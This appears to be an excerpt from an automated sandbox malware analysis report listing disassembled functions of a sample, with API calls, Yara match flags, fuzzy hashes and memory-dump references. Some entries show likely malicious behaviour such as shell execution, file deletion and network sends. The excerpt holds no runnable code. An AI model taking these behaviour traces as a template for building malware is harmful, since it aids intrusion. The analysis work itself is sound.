                                                                                                                                                                • Opcode Fuzzy Hash: 97654dcdd13d0928d0830d68fc649d03cc2cdcd550a9de1e2076be80035f5ddb
                                                                                                                                                                • Instruction Fuzzy Hash: 9051B131A042059BD644F738D85ABEE36A7AB95310F408629F44A872E7EE2C8E45C7D7
                                                                                                                                                                Function 6FE746C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 140COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6FE74783
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6FE7478B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE74797
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE747A9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE74843
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$CurrentDirectory
                                                                                                                                                                • String ID: uo&$uo&
                                                                                                                                                                • API String ID: 3993060814-4100988267
                                                                                                                                                                • Opcode ID: 5de9db260095c3810e1a0771333349602f18eb3ff58f9e5701f288658a7a6bd5
                                                                                                                                                                • Instruction ID: fb6171d91239a1d2e66869e5afeead557843a912a439a8da09a383c2ff6c1fb3
                                                                                                                                                                • Opcode Fuzzy Hash: 5de9db260095c3810e1a0771333349602f18eb3ff58f9e5701f288658a7a6bd5
                                                                                                                                                                • Instruction Fuzzy Hash: 4B51B3B1D01648DBEB20CFA8D84479EBFB9FF46314F20011AE814BB340EB755944CB91
                                                                                                                                                                Function 00076037 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00076284: __EH_prolog.LIBCMT ref: 00076289
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,000C2774), ref: 00076134
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0007613D
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0007614C
                                                                                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00076100
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                                • String ID: <$@$Temp
                                                                                                                                                                • API String ID: 1704390241-1032778388
                                                                                                                                                                • Opcode ID: 595bbe002879234caa93ac9520a3c846cb7f6491fd1f21b92d9f4fcb12e0e570
                                                                                                                                                                • Instruction ID: ff28b374ceac5651e4c6e1cfe5512d8ac32b4251e6b73ac0b56b3bbc92f92f22
                                                                                                                                                                • Opcode Fuzzy Hash: 595bbe002879234caa93ac9520a3c846cb7f6491fd1f21b92d9f4fcb12e0e570
                                                                                                                                                                • Instruction Fuzzy Hash: D2415031A046099BEB14FB60DC56FEEB77AAF10300F504268F50A661E3DF795A89CB91
                                                                                                                                                                Function 00067405 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 0006745E
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 000674A6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 000674E0
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 000674F8
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 0006751C
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0006752B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                                                                                                                                                • String ID: .part
                                                                                                                                                                • API String ID: 820096542-3499674018
                                                                                                                                                                • Opcode ID: 3195e6a5e91192617a20816430c4f1bbc4eac7866fb9f3d7f622e59b4d7ce52f
                                                                                                                                                                • Instruction ID: e44a325b0253e4bfdb59896d0770276d274c5277b7acd807f07b7310892b5e2b
                                                                                                                                                                • Opcode Fuzzy Hash: 3195e6a5e91192617a20816430c4f1bbc4eac7866fb9f3d7f622e59b4d7ce52f
                                                                                                                                                                • Instruction Fuzzy Hash: CC315871D00219ABDB04EFA4DC8A9EEB77AFF08310F10856AF811A3242DF746E44CB60
                                                                                                                                                                Function 000A6286 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0008B9D1,?,?,?,000A64D7,00000001,00000001,?), ref: 000A62E0
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 000A6318
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0008B9D1,?,?,?,000A64D7,00000001,00000001,?), ref: 000A6366
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 000A63FD
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000A6460
                                                                                                                                                                • __freea.LIBCMT ref: 000A646D
                                                                                                                                                                  • Part of subcall function 000A15B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                • __freea.LIBCMT ref: 000A6476
                                                                                                                                                                • __freea.LIBCMT ref: 000A649B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3864826663-0
                                                                                                                                                                • Opcode ID: 65913d1f976b4083ed7407f3351f9d706940f9464b2ec486a9cc4fd3cb3e470e
                                                                                                                                                                • Instruction ID: 5d6aa831f965fce0a0b91dd2b49722cf823f7378a64551691e4c14e56a1ce7cd
                                                                                                                                                                • Opcode Fuzzy Hash: 65913d1f976b4083ed7407f3351f9d706940f9464b2ec486a9cc4fd3cb3e470e
                                                                                                                                                                • Instruction Fuzzy Hash: F151D572600216AFEF258FA4CC41EEF77F9EB46750F194628FD05EA141DB36DD4086A0
                                                                                                                                                                Function 6FE998D0 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                • Opcode ID: df27ad26c0ca7bb847937b8044854fb6828265a1c7ba2084fc8d6cd1c4f4517d
                                                                                                                                                                • Instruction ID: edc316a14ece5d07c2e17962dcbf77bea9ad7ae76efdbab789b14decab398152
                                                                                                                                                                • Opcode Fuzzy Hash: df27ad26c0ca7bb847937b8044854fb6828265a1c7ba2084fc8d6cd1c4f4517d
                                                                                                                                                                • Instruction Fuzzy Hash: 3DB114729043599FDB018F68CC91BEE7FA5EF56318F24415AE844AF389E774A901C7B0
                                                                                                                                                                Function 0259D445 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: b88bbf764e64fee258903e57f37d3f4e4f518c79a1f6a117d43c188704286c30
                                                                                                                                                                • Instruction ID: 9d4b3bc7db251bed0b0c15493a8cd8a18d94802e7b25220a3d0ded39bc4c12ef
                                                                                                                                                                • Opcode Fuzzy Hash: b88bbf764e64fee258903e57f37d3f4e4f518c79a1f6a117d43c188704286c30
                                                                                                                                                                • Instruction Fuzzy Hash: FB61D571901216AFDF20EF68C841B9ABBF6FF45720F144569E858EB240E770AD41CF98
                                                                                                                                                                Function 000A4346 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000A15B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                • _free.LIBCMT ref: 000A4451
                                                                                                                                                                • _free.LIBCMT ref: 000A4468
                                                                                                                                                                • _free.LIBCMT ref: 000A4487
                                                                                                                                                                • _free.LIBCMT ref: 000A44A2
                                                                                                                                                                • _free.LIBCMT ref: 000A44B9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$AllocateHeap
                                                                                                                                                                • String ID: w;
                                                                                                                                                                • API String ID: 3033488037-1922605537
                                                                                                                                                                • Opcode ID: cb65a1e2cfc189b91eec8a44ec24704b4ee6f7f84aff9380e1e32a636c79f685
                                                                                                                                                                • Instruction ID: b02cd2494bbd5a20ad39199121c3f5fea9621589291477a8b94bbf8f5f5828d7
                                                                                                                                                                • Opcode Fuzzy Hash: cb65a1e2cfc189b91eec8a44ec24704b4ee6f7f84aff9380e1e32a636c79f685
                                                                                                                                                                • Instruction Fuzzy Hash: B551C436A00704AFDB60DFA9C841BAA77F4EF9A720F14466DE909DB251E7B5ED01CB40
                                                                                                                                                                Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                                                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                Function 6FE7EF60 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,6FEA5179,?), ref: 6FE7EFC4
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000001), ref: 6FE7F06B
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6FE7F09E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value$AddressSingleWake
                                                                                                                                                                • String ID: yQo$o&$o&
                                                                                                                                                                • API String ID: 232517740-3584872725
                                                                                                                                                                • Opcode ID: d74055cf24891127288e25555408042d82c231270f1bae314e42172c42e50d65
                                                                                                                                                                • Instruction ID: e48ba57f910c1a29a08dc5a27acafc368361030eed3ebbcbb4e8b87b427a7ca1
                                                                                                                                                                • Opcode Fuzzy Hash: d74055cf24891127288e25555408042d82c231270f1bae314e42172c42e50d65
                                                                                                                                                                • Instruction Fuzzy Hash: D24115B19006499FDB24CF58C844BEE7FB5FF4632CF240169E514AB790DB35A845CBA1
                                                                                                                                                                Function 6FE93D50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6FE93D87
                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6FE93D8F
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6FE93E18
                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6FE93E43
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6FE93E98
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                • String ID: csm
                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                • Opcode ID: 97db3ce92591675723c383d2040b8d2c6c59d16bfd28f00e622f052158980895
                                                                                                                                                                • Instruction ID: f7231125fa0595b69f900cf636279d5b94971d1e18fcc3a12fddc66c4e5a4470
                                                                                                                                                                • Opcode Fuzzy Hash: 97db3ce92591675723c383d2040b8d2c6c59d16bfd28f00e622f052158980895
                                                                                                                                                                • Instruction Fuzzy Hash: C64163349003099FCF00DFA9CC95A9EBFB9BF46328F20815AE8185B395D731E955CBA1
                                                                                                                                                                Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                • String ID: csm
                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                Function 0255F3EA Relevance: 10.6, APIs: 7, Instructions: 76COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0255F3F7
                                                                                                                                                                • int.LIBCPMT ref: 0255F40A
                                                                                                                                                                  • Part of subcall function 0255CC38: std::_Lockit::_Lockit.LIBCPMT ref: 0255CC49
                                                                                                                                                                  • Part of subcall function 0255CC38: std::_Lockit::~_Lockit.LIBCPMT ref: 0255CC63
                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0255F413
                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0255F44A
                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0255F453
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0255F471
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0255F4B9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2409581025-0
                                                                                                                                                                • Opcode ID: 4ccb529b2c793de59ffa1319435df9f7247f56cfea9ee7c9dcdf8cb5ec2dfc6c
                                                                                                                                                                • Instruction ID: 13c3b98d7d5bacce3a24a547ed36af5bbdb4405236a224b4b2bbff2906fb3d89
                                                                                                                                                                • Opcode Fuzzy Hash: 4ccb529b2c793de59ffa1319435df9f7247f56cfea9ee7c9dcdf8cb5ec2dfc6c
                                                                                                                                                                • Instruction Fuzzy Hash: 51213732400136EBC700FB68C9629AE776AFF81320B10421BEC40F7690DF75A9018F9D
                                                                                                                                                                Function 6FE988D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,6FE989DF,00000000,6FE980F4,00000000,00000000,00000001,?,6FE98B58,00000022,FlsSetValue,6FEB2308,6FEB2310,00000000), ref: 6FE98991
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                • Opcode ID: ad4ba9d2b9aa923bd5bbddb922daa918aab1486830502950cd8cbaf45d7f0c71
                                                                                                                                                                • Instruction ID: a212ccdc8af1e253005f6f09d5475b063240cc93438bf384608b82dc5b00c77e
                                                                                                                                                                • Opcode Fuzzy Hash: ad4ba9d2b9aa923bd5bbddb922daa918aab1486830502950cd8cbaf45d7f0c71
                                                                                                                                                                • Instruction Fuzzy Hash: 1021C635508611ABCB219B68DC40A4E3F68EF53779F700126E959A72B1D734EB11C6B1
                                                                                                                                                                Function 0259D91A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: f0b1b3cef5ee600502cac9cc827a00046fd7a72ae26d3d65b96edc04095a00f7
                                                                                                                                                                • Instruction ID: 0de280fe1ac6a66d7ddf80b81830be1b549c75bf024564c4291e1a182cbf0f41
